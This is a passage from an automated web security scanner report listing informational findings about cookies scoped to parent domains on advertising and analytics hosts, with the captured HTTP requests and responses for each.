X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:21 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04961D-7167-1669492C"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A41%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=http%3A//support.ea.com/app/answers/detail/a_id/4394&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:42 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:42 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04957E-289C-64EC62A2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A15%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:15 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049617-7405-11B63051"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www414
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A18%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/ea&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/ea&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:19 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:19 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0495A3-354B-1AB15A04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707?[AQB]&ndh=1&t=24/5/2011%208%3A44%3A5%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v1=Not%20Logged%20In&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B795-6000018160001985|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:44:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:44:06 GMT
Last-Modified: Sat, 25 Jun 2011 13:44:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0494A6-6F1B-46C49248"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www411
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.25. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=116889&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)(>Mwz%)_`z[:mPWhOPI9XDFhV./:U50e293-Kvq%pSv/-CrYm4qjBD$l#D6X7kL*Gon#lKeGg(I/0xY%G_wf%/9SAjDR9%mEtufj#5kI+687EEs4`p7@]!Cu'2i*kgqP*gC83(V[bMK+Z!X*h/E@nqY28_[/LHgJALhZ6F`O-W9Y:$uaZey2a9vrW$d=[>)H_]kQ1p:.C_!ftDA7#p2M6-mZ$6Md!-m>]T('5Q5PH9V)4w#p!vR:d^f1l#p?2ndxaH]IB$9^TI>*#bjKq!@wcDPY-fh64Xm$p+Qrw+yDMpTOqtfut3ihD%Pg0DN5X/5YdqnfTjetzaJ>he-w13KS+'9vyjtH)ZY7uy(3p(IUn=TzS*)ESmgwx<wc-[7:cJ%W=+YWoRa6y.'c)1WpOx7Fkso#ovB=o$Y?/srqMUWroyCiVTS(oHlhJU2?5](tdx?e$N0Yk6@uGdmIh3Rs!a6GbEZ4E4)mud^if]1EnJMfnTtvAWfI6j$zZ]h:8FX05B)eJ9Ys>ZX'E9FcQ`_svd*?j7027EQ6:tWVY8iN3/zjKA6]cD28dvlu'pOcY1GietF(FXHVvj5/I*OT3]^H?R$jt41wt7LLYkBjeX8VW56p^!8UJJr4##]ewVu0nM9O%`cMeJ<z>D; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(ByG5K)WgR>?.+UI.b6+F*gFFRYp*xrtU*ZxoKfg>?3=*ijt$+z9$J(!=3[xo+Vdv$CJ[J3)]jfIENCh2k'(YvU>7%w:Ah%lXv2u*lS*i_#:w([I.`GFZV<KPlrE>cBm`g/i@>eoX9SESC@d]ks)brLQUy-Mn:b/AwSLhdgiWVNoZ22VUco)=>ej%`5dFNks^zkSswXXS?5KKvZ0`#34WA:0qW*$^?3?U>lz!8huyZz#@DDavDi9'PZF4^fvCe)YAwg%LO$S<wKCPLGuv#J6FCl3(ahmE/YEN9NG(:KuQ^V6fBc8]!n:lvwN-:Ogsvvq>U`94GCv1UXjSzUSAICm9p^8nEUsig`G'8><fIqzl21[1Ejk?%.m1%Fm.BG7w8FmN^1U?0.h!<k$a_YXcCHD<^=$BsLp$pb?L2+fc.tSY10Jf$PmV(#pIcaA6A2(i')atPd0[!WH-bV<9saxr.g`axSdN%IbK@@feSUTJuWJC!GZYetN(4=%ju`+=fs(K<64Ev(uRdtY_iI!aq>'WzyLmv^Z(]$=ZWPtUvV6L1XnM6U`Z(.jD)EHCsXbooUIwVdPrtYVS(v=M(<nOFD]))e-oIbcz7U4fbFEUz%S7nI_O#q@kKOkupw/iy_vEG4k2yQA@wd6VLq%qxQhzNvWvJ4Hqc^1ts; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Location: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Date: Fri, 24 Jun 2011 13:18:31 GMT
Content-Length: 0

12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

Issue detail

